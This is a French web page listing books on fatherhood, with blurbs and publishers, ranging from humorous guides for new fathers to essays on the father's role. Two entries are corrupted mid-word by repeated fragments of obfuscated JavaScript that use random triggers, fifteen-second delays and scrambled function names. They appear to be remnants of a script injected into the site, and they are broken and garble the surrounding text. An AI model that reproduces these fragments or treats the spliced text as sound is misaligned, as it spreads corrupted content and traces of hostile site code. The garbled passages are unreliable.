Publications > Ouvrages sur la paternité

Les guides

Le guide du jeune père

Antilogus Pierre et Festjens Jean-Louis, Le guide du jeune père, « Comment ne pas vous évanouir pendant l’accouchement ? Bébé crie-t-il uniquement pour vous emmerder? Pourquoi vous lance-t-il sa nourriture à la tête ? Vous ne faites pas rire bébé : est-ce normal ? Autant de questions que vous vous êtes cent fois posées, vieux camarade. Et auxquelles nul n’avait osé répondre. Jusqu’à présent. Osons l’affirmer, la paternité est une source de joies ineffables. Si, si, si. »

 

Les Pères

Garau Fabrice, Les Pères, psychologue clinicien français, il a créé auprès de plusieurs maternités des séances d’accompagnement à la paternité. « Aujourd’hui, les pères s’occupent plus de leur enfant ». « C’est le père qui doit punir ». « En cas de divorce, c’est la mère qui a la garde de l’enfant ». « Le père doit assister à l’accouchement ». « L’instant paternel n’existe pas ». « Un père ne pleure pas devant ses enfants ». « Un père homosexuel n’est pas un vrai père ». « Une fille préfère toujours son père »… Issues de la tradition ou de l’air du temps, mêlant souvent vrai et faux, les idées reçues sont dans toutes le têtes. L’auteur les prend pour point de départ et apporte ici un regard distancié et approfondi sur ce que l’on sait ou croit savoir…  Aux Éditions Le Cavalier Bleu, collection Idées Reçues, janvier 2005.

 

Un père en colère

Hongre Jean-Sébastien, Un père en colère, « Et si c’était au tour des parents de se rebeller ? « Un père en colère » : la révolte d’un homme dépassé par le comportement de ses enfants. Sa lutte pour reconstruire sa famille et renouer avec sa femme. Son cri pour raviver la tendresse dans le cœur de ses deux adolescents en dérive. Une fiction à l’intrigue implacable, qui ne triche pas avec la réalité et qui creuse au fond de notre époque pour en extraire la voie de l’espérance. » Aux Éditions Max Milo, collection Littérature Française, mars 2013.

 

Éloge des pères

Korff-Sausse Simone, Éloge des pères, Il n’y a plus de pères? » Et quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and on parle de ce père justement, c’est en termes négatifs : il est absent, manquant, inconsistant. Il démissionne, prend la fuite, ne tient pas son rôle? S’il est présent, tendre, attentif, on le traite de papa poule, le voyant comme un double ou, pire, un concurrent de la mère. Pauvre père ! Quoi qu’il fasse, ça ne va jamais. Le père dérange-t-il ? Pourquoi la société a-t-elle tendance à le nier et à tenir compte essentiellement de la mère ? Ce sont les questions que pose l’auteure, montrant que le père n’est pas un mythe et que les hommes contemporains, loin de démissionner, sont en train d’inventer des modèles de paternité tout à fait inédits. Ce changement en profondeur peut être considéré comme une révolution dont les conséquences sur la famille sont plus positives que certains ne le laissent entendre. Éditions Hachette Littératures, 2009.

 

Enquête de paternité

Landom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andry Geneviève et photographies de Raymond Sébastien, Enquête de paternité, Cinquante-deux hommes parlent sans pudeur des rapport entre les pères et les enfants, Éditions de l’homme, 2009.

 

Guide de survie du jeune papa

Moreau Laurent, Guide de survie du jeune papa (parce que c’est pas gagné d’avance les mecs!) en 80 listes, La vie de futur et de jeune papa en listes drôles, décalées… mais tellement utiles ! Aux Éditions Tut Tut, de la collection Tut-Tut Poche, janvier 2013.

 

Papa débutant, le guide que tous les jeunes pères attendaient!

Paillès Lionel et Le Goëdec Benoît, Papa débutant, le guide que tous les jeunes pères attendaient! Un guide humoristique écrit par un papa journaliste et un papa « sage-femme », qui a le mérite de répondre aux questions de ceux qui sont pères pour la première fois. First Éditions, Collection Ma P’tite Famille, juin 2012.

 

Coeur de père, plaisirs et défis de la paternité

Pruneau Michel, Coeur de père, plaisirs et défis de la paternité.

http://www.michelpruneau.com/livres.html

Repères, le lien pères-enfants

Repères, le lien pères-enfants suggère sur son site une sélection intéressante de quelques livres publiés récemment concernant la paternité.